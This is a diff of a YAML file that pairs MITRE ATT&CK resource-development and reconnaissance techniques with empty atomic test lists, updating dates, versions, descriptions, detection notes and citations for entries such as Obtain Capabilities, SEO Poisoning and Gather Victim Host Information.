-        source_name: PegasusCitizenLab
-      - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
-          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
-        source_name: DiginotarCompromise
-        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
-      - source_name: FireEyeSupplyChain
-        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
-          SunshopFireEye. Retrieved March 6, 2017.'
-        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      - source_name: Recorded Future Beacon Certificates
-        url: https://www.recordedfuture.com/cobalt-strike-servers/
-        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
-          Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:19:41.568Z'
       name: Obtain Capabilities
       description: |-
         Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
@@ -54217,22 +54832,66 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Certificate: Certificate Registration'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
       - 'Malware Repository: Malware Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+      created: '2020-10-01T01:56:24.776Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588
+        external_id: T1588
+      - source_name: PegasusCitizenLab
+        description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+          Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+          Human Rights Defender. Retrieved December 12, 2016.'
+        url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+      - source_name: FireEyeSupplyChain
+        description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+          SunshopFireEye. Retrieved March 6, 2017.'
+        url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+      - source_name: DiginotarCompromise
+        description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+          Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+        url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+      - source_name: Recorded Future Beacon Certificates
+        description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+          Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+        url: https://www.recordedfuture.com/research/cobalt-strike-servers
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: NationsBuying
+        description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+          Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+        url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1650:
     technique:
@@ -54295,37 +54954,38 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.007:
     technique:
-      modified: '2022-10-20T21:19:57.555Z'
+      modified: '2024-10-03T14:18:34.045Z'
       name: Serverless
       description: "Adversaries may compromise serverless cloud infrastructure, such
-        as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
-        By utilizing serverless infrastructure, adversaries can make it more difficult
-        to attribute infrastructure used during operations back to them. \n\nOnce
-        compromised, the serverless runtime environment can be leveraged to either
-        respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+        as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+        can be used during targeting. By utilizing serverless infrastructure, adversaries
+        can make it more difficult to attribute infrastructure used during operations
+        back to them. \n\nOnce compromised, the serverless runtime environment can
+        be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
         traffic to an adversary-owned command and control server.(Citation: BlackWater
-        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
-        by these functions will appear to come from subdomains of common cloud providers,
-        it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+        Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+        Apps Script Abuse 2021) As traffic generated by these functions will appear
+        to come from subdomains of common cloud providers, it may be difficult to
+        distinguish from ordinary traffic to these providers - making it easier to
+        [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
         Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
         Workers)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
-      x_mitre_detection: ''
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
+      x_mitre_contributors:
+      - Awake Security
       x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Awake Security
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54349,11 +55009,14 @@ resource-development:
         description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
           Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
         url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+      - source_name: GWS Apps Script Abuse 2021
+        description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+          Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.004:
     technique:
@@ -54411,17 +55074,18 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.006:
     technique:
-      modified: '2023-03-13T20:35:52.302Z'
+      modified: '2024-08-14T15:03:56.383Z'
       name: SEO Poisoning
       description: |-
         Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
 
         To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
 
+        In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
         Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
 
         SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -54429,7 +55093,7 @@ resource-development:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Vijay Lalwani
       - Will Thomas, Equinix Threat Analysis Center (ETAC)
       - Will Jolliffe
@@ -54443,7 +55107,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       type: attack-pattern
@@ -54476,11 +55140,18 @@ resource-development:
         description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
           September 30, 2022.
         url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+      - source_name: Chexmarx-seo
+        description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+          the Star Ranking Game. Retrieved June 18, 2024.'
+        url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+      - source_name: Checkmarx-oss-seo
+        description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+          Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+        url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.003:
     technique:
@@ -54502,7 +55173,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:19:50.018Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -54520,47 +55191,10 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
-      type: attack-pattern
-      created: '2020-10-01T01:30:00.877Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1587
-        url: https://attack.mitre.org/techniques/T1587
-      - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
-        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
-          Units. Retrieved July 18, 2016.
-        source_name: Mandiant APT1
-      - source_name: Kaspersky Sofacy
-        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
-          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
-          December 10, 2015.
-        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
-      - source_name: Bitdefender StrongPity June 2020
-        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
-        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
-          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
-      - source_name: Talos Promethium June 2020
-        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
-        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
-          reach with StrongPity3 APT. Retrieved July 20, 2020.
-      - source_name: Splunk Kovar Certificates 2017
-        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
-        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
-          Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:31:17.270Z'
       name: Develop Capabilities
       description: |-
         Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54569,21 +55203,57 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
 
         Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
       - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+      created: '2020-10-01T01:30:00.877Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1587
+        external_id: T1587
+      - source_name: Kaspersky Sofacy
+        description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+          4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+          December 10, 2015.
+        url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+      - source_name: Splunk Kovar Certificates 2017
+        description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+          Certificates. Retrieved October 16, 2020.
+        url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+      - source_name: Mandiant APT1
+        description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+          Units. Retrieved July 18, 2016.
+        url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+      - source_name: Talos Promethium June 2020
+        description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+          reach with StrongPity3 APT. Retrieved July 20, 2020.
+        url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+      - source_name: Bitdefender StrongPity June 2020
+        description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+          Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+        url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1588.005:
     technique:
@@ -54623,7 +55293,7 @@ resource-development:
         description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
           Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
           October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:14:01.255Z'
       name: Exploits
       description: |-
         Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54642,15 +55312,13 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.001:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-24T15:10:40.270Z'
       name: Domains
       description: |-
-        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+        Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
 
         Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
 
@@ -54658,19 +55326,19 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Jeremy Galloway
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.3'
-      x_mitre_contributors:
-      - Jeremy Galloway
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -54704,55 +55372,64 @@ resource-development:
         url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 reconnaissance:
   T1592:
     technique:
-      x_mitre_platforms:
-      - PRE
+      modified: '2024-10-03T19:35:07.269Z'
+      name: Gather Victim Host Information
+      description: |-
+        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+        Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: reconnaissance
+      x_mitre_contributors:
+      - Sam Seabrook, Duke Energy
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Internet Scan: Response Content'
       type: attack-pattern
+      id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
       created: '2020-10-02T16:39:33.966Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1592
         url: https://attack.mitre.org/techniques/T1592
+        external_id: T1592
       - source_name: ATT ScanBox
-        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+        url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+      - source_name: TrellixQakbot
+        description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+          Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+          Distribution. Retrieved August 1, 2024.
+        url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
       - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Gather Victim Host Information
-      description: |-
-        Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
-        Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: reconnaissance
-      x_mitre_detection: |-
-        Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
-        Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.1'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Internet Scan: Response Content'
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1596.003:
     technique:
@@ -54777,7 +55454,7 @@ reconnaissance:
         url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
         description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
           from Server (Site URL). Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:48:37.628Z'
       name: Digital Certificates
       description: |-
         Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -54793,8 +55470,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.002:
     technique:
